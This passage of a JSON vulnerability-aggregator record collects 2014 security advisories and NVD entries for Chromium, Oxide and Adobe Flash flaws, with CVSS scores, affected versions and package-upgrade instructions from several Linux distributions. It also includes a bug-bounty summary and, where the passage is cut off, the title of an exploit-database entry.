overflow)\nBuffer overflow in OpenJPEG before r2911 in PDFium allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via a crafted JPEG image.\n\n- CVE-2014-7904 (buffer overflow)\nBuffer overflow in 
Skia allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via unknown vectors.\n\n- CVE-2014-7906 (use-after-free)\nUse-after-free vulnerability in the Pepper plugins allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via crafted Flash content that triggers an attempted\nPepperMediaDeviceManager access outside of the object's lifetime.\n\n- CVE-2014-7907 (use-after-free)\nMultiple use-after-free vulnerabilities in\nmodules/screen_orientation/ScreenOrientationController.cpp in Blink\nallow remote attackers to cause a denial of service or possibly have\nunspecified other impact via vectors that trigger improper handling of a\ndetached frame, related to the (1) lock and (2) unlock methods.\n\n- CVE-2014-7908 (integer overflow)\nMultiple integer overflows in the CheckMov function in\nmedia/base/container_names.cc allow remote attackers to cause a denial\nof service or possibly have unspecified other impact via a large atom in\n(1) MPEG-4 or (2) QuickTime .mov data.\n\n- CVE-2014-7909 (uninitialized memory read)\nA flaw in effects/SkDashPathEffect.cpp in Skia computes a hash key using\nuninitialized integer values, which might allow remote attackers to\ncause a denial of service by rendering crafted data.\n\n- CVE-2014-7910 (various issues)\nVarious issues from internal audits, fuzzing and other initiatives that\nallow attackers to cause a denial of service or possibly have other impact.", "modified": "2014-11-20T00:00:00", "published": "2014-11-20T00:00:00", "id": "ASA-201411-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-November/000151.html", "type": "archlinux", "title": "chromium: multiple issues", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", 
"CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "These updates resolve memory corruption vulnerabilities that could lead\nto code execution (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440,\nCVE-2014-8441).\n\nThese updates resolve use-after-free vulnerabilities that could lead to\ncode execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\nThese updates resolve a double free vulnerability that could lead to\ncode execution (CVE-2014-0574).\n\nThese updates resolve type confusion vulnerabilities that could lead to\ncode execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\nCVE-2014-0586, CVE-2014-0590).\n\nThese updates resolve heap buffer overflow vulnerabilities that could\nlead to code execution (CVE-2014-0582, CVE-2014-0589).\n\nThese updates resolve an information disclosure vulnerability that could\nbe exploited to disclose session tokens (CVE-2014-8437).\n\nThese updates resolve a heap buffer overflow vulnerability that could be\nexploited to perform privilege escalation from low to medium integrity\nlevel (CVE-2014-0583).\n\nThese updates resolve a permission issue that could be exploited to\nperform privilege escalation from low to medium integrity level\n(CVE-2014-8442).", "modified": "2014-11-13T00:00:00", "published": "2014-11-13T00:00:00", "id": "ASA-201411-11", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-November/000136.html", "type": "archlinux", "title": "flashplugin: remote code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7899", "CVE-2014-7904", "CVE-2014-7906", "CVE-2014-7907", "CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7910"], "description": "Chromium is an open-source web 
browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907, CVE-2014-7910, \nCVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. A malicious\nattacker could use this flaw to perform phishing attacks. (CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 39.0.2171.65, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "modified": "2018-06-07T09:04:30", "published": "2014-11-24T05:00:00", "id": "RHSA-2014:1894", "href": "https://access.redhat.com/errata/RHSA-2014:1894", "type": "redhat", "title": "(RHSA-2014:1894) Important: chromium-browser security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0573", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0577", "CVE-2014-0581", "CVE-2014-0582", "CVE-2014-0584", "CVE-2014-0585", "CVE-2014-0586", "CVE-2014-0588", "CVE-2014-0589", "CVE-2014-0590", "CVE-2014-8437", "CVE-2014-8438", "CVE-2014-8440", "CVE-2014-8441"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-24,\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. 
An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2014-0573, CVE-2014-0574, CVE-2014-0576, CVE-2014-0577,\nCVE-2014-0581, CVE-2014-0582, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\nCVE-2014-0588, CVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin that\ncould allow a remote attacker to obtain a victim's session cookie.\n(CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.418.\n", "modified": "2018-06-07T09:04:20", "published": "2014-11-13T05:00:00", "id": "RHSA-2014:1852", "href": "https://access.redhat.com/errata/RHSA-2014:1852", "type": "redhat", "title": "(RHSA-2014:1852) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "A buffer overflow was discovered in Skia. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer crash or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit these to cause a denial of service via renderer crash or execute \narbitrary code with the privileges of the sandboxed render process. \n(CVE-2014-7907)\n\nAn integer overflow was discovered in media. 
If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer crash or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to cause a denial of service via renderer crash. \n(CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial of \nservice via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2014-7910)", "edition": 5, "modified": "2014-11-19T00:00:00", "published": "2014-11-19T00:00:00", "id": "USN-2410-1", "href": "https://ubuntu.com/security/notices/USN-2410-1", "title": "Oxide vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "Multiple memory corruptions.", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14118", "title": "Oxide multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security 
Notice USN-2410-1\r\nNovember 19, 2014\r\n\r\noxide-qt vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Oxide.\r\n\r\nSoftware Description:\r\n- oxide-qt: Web browser engine library for Qt (QML plugin)\r\n\r\nDetails:\r\n\r\nA buffer overflow was discovered in Skia. If a user were tricked in to\r\nopening a specially crafted website, an attacker could potentially exploit\r\nthis to cause a denial of service via renderer crash or execute arbitrary\r\ncode with the privileges of the sandboxed render process. (CVE-2014-7904)\r\n\r\nMultiple use-after-frees were discovered in Blink. If a user were tricked\r\nin to opening a specially crafted website, an attacker could potentially\r\nexploit these to cause a denial of service via renderer crash or execute\r\narbitrary code with the privileges of the sandboxed render process.\r\n(CVE-2014-7907)\r\n\r\nAn integer overflow was discovered in media. If a user were tricked in to\r\nopening a specially crafted website, an attacker could potentially exploit\r\nthis to cause a denial of service via renderer crash or execute arbitrary\r\ncode with the privileges of the sandboxed render process. (CVE-2014-7908)\r\n\r\nAn uninitialized memory read was discovered in Skia. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit this to cause a denial of service via renderer crash.\r\n(CVE-2014-7909)\r\n\r\nMultiple security issues were discovered in Chromium. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit these to read uninitialized memory, cause a denial of\r\nservice via application crash or execute arbitrary code with the\r\nprivileges of the user invoking the program. 
(CVE-2014-7910)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.10:\r\n liboxideqtcore0 1.3.4-0ubuntu0.14.10.1\r\n oxideqt-codecs 1.3.4-0ubuntu0.14.10.1\r\n oxideqt-codecs-extra 1.3.4-0ubuntu0.14.10.1\r\n\r\nUbuntu 14.04 LTS:\r\n liboxideqtcore0 1.3.4-0ubuntu0.14.04.1\r\n oxideqt-codecs 1.3.4-0ubuntu0.14.04.1\r\n oxideqt-codecs-extra 1.3.4-0ubuntu0.14.04.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2410-1\r\n CVE-2014-7904, CVE-2014-7907, CVE-2014-7908, CVE-2014-7909,\r\n CVE-2014-7910\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/oxide-qt/1.3.4-0ubuntu0.14.10.1\r\n https://launchpad.net/ubuntu/+source/oxide-qt/1.3.4-0ubuntu0.14.04.1\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31430", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31430", "title": "[USN-2410-1] Oxide vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2021-02-02T06:14:34", "description": "Integer overflow in the opj_t2_read_packet_data function in fxcodec/fx_libopenjpeg/libopenjpeg20/t2.c in OpenJPEG in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long segment in a JPEG image.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7901", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7901"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7901", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PDF document.", "edition": 4, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7902", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7902"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.63"], "id": "CVE-2014-7902", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7902", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.63:*:*:*:*:*:*:*"]}, {"lastseen": 
"2021-02-02T06:14:34", "description": "Google Chrome before 39.0.2171.65 on Android does not prevent navigation to a URL in cases where an intent for the URL lacks CATEGORY_BROWSABLE, which allows remote attackers to bypass intended access restrictions via a crafted web site.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7905", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7905"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7905", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:android:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in the CPDF_Parser::IsLinearizedFile function in fpdfapi/fpdf_parser/fpdf_parser_parser.cpp in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PDF document.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7900", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7900"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7900", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Buffer overflow in Skia, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7904", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7904"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7904", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Google Chrome before 38.0.2125.101 allows remote attackers to spoof the address bar by placing a blob: substring at the beginning of the URL, followed by the original URI 
scheme and a long username string.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7899", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7899"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:38.0.2125.7"], "id": "CVE-2014-7899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7899", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:38.0.2125.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Buffer overflow in OpenJPEG before r2911 in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted JPEG image.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7903", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7903"], "modified": "2017-09-08T01:29:00", "cpe": 
["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7903", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7903", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Multiple use-after-free vulnerabilities in modules/screen_orientation/ScreenOrientationController.cpp in Blink, as used in Google Chrome before 39.0.2171.65, allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger improper handling of a detached frame, related to the (1) lock and (2) unlock methods.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7907", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7907"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7907", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7907", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in the Pepper plugins in Google Chrome before 39.0.2171.65 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Flash content that triggers an attempted PepperMediaDeviceManager access outside of the object's 
lifetime.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7906", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7906"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7906", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "effects/SkDashPathEffect.cpp in Skia, as used in Google Chrome before 39.0.2171.65, computes a hash key using uninitialized integer values, which might allow remote attackers to cause a denial of service by rendering crafted data.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7909", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7909"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": 
"CVE-2014-7909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7909", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", "CVE-2014-7900"], "edition": 1, "description": "### Background\n\nChromium is an open-source web browser project.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process or cause a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-39.0.2171.65\"", "modified": "2014-12-13T00:00:00", "published": "2014-12-13T00:00:00", "id": "GLSA-201412-13", "href": "https://security.gentoo.org/glsa/201412-13", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0558", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-0564", "CVE-2014-8441"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.418\"", "modified": "2014-11-21T00:00:00", "published": "2014-11-21T00:00:00", "id": "GLSA-201411-06", "href": "https://security.gentoo.org/glsa/201411-06", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2014-0574"], "description": "The issue occurs while sharing a bytearray between two workers. If both call bytearray.clear() at the same time, Flash does not correctly handle the race and may double free the array.\r\n\r\nIdentified as CVE-2014-0574, and reported to Adobe via Chrome VRP:\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-24.html\r\n\r\nOriginal report with proof of concept:\r\nhttps://code.google.com/p/chromium/issues/detail?id=423703", "modified": "2019-11-12T09:44:15", "published": "2014-11-24T08:10:24", "id": "H1:37240", "href": "https://hackerone.com/reports/37240", "type": "hackerone", "title": "Flash (IBB): Race condition in Flash workers may cause an exploitable double free", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T23:55:10", "description": "GNU bash Environment Variable Command Injection (MSF). 
